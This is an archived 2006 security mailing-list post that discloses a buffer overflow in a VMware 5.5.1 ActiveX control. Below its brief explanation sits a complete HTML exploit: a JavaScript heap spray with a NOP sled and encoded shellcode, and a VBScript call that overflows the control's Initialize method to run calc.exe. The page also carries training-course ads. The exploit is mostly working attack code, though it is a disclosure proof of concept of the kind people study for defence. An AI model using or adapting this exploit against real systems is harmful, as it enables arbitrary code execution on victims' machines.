Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

VMware 5.5.1 Local Buffer Overflow (HTML Exploit)

from [NormandiaN_MailID] Network Security [Permanent Link]
Subject: VMware 5.5.1 Local Buffer Overflow (HTML Exploit)
Date: 26 Nov 2006 06:05:34 -0000 
<html>
<head>
<title>WinXP Pro SP2 lame local VMWare Buffer Overflow</title>
</head>
<body>
<center>
<br>
Discovered By NormandiaN<br>
Visit my website at http://www.grisapka.org<br>
<br>
<h3>
This will exploit overflow and execute calc.exe on WinXP Pro SP2<br>
(fully patched) against VMWare 5.5.1 Initialize ActiveX member.<br>
</h3>
I have only found a bad solution to this bug. Due to the fact that<br>
my controlling assembler is a call dword ptr[reg] I need to point<br>
to a location I control, fine. However my payload is random pretty<br>
much every run. Therefor I fill half a HUGE  buffer with the address<br>
(pointer) to my evil buffer, which them trampolines me to shellcode<br>
<br>
call ptr [reg]<br>
[reg] -> 0xtrampoline<br>
0xtrampoline -> shellcode<br>
<br>
</center>
<script>
var buffa1 = unescape("%uedb0%u0d91") 
do {
buffa1 += buffa1;
}
while (buffa1.length < 0x500000);
var buffa2 = unescape("%u9090%u9090") 
do {
buffa2 += buffa2;
}
while (buffa2.length < 0x800000);
buffa1 += buffa2;
buffa1 += unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + 
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");
</script>
<object id="target" classid="clsid:F76E4799-379B-4362-BCC4-68B753D10744">
</object>
<script language="vbscript">
VmdbDb=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
VmdbPoll=200011744
target.Initialize VmdbDb, VmdbPoll
</script>
</body>
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  ClickGallery Sql Injection, Advisory
Next by Date:  Re: [Full-disclosure] The state of JavaScript Hacking, Martin Johns
Previous by Thread:  ClickGallery Sql Injection, Advisory
Next by Thread:  Re: VMware 5.5.1 Local Buffer Overflow (HTML Exploit), str0ke
Indexes:  [Date] [Thread] [Top] [All Lists]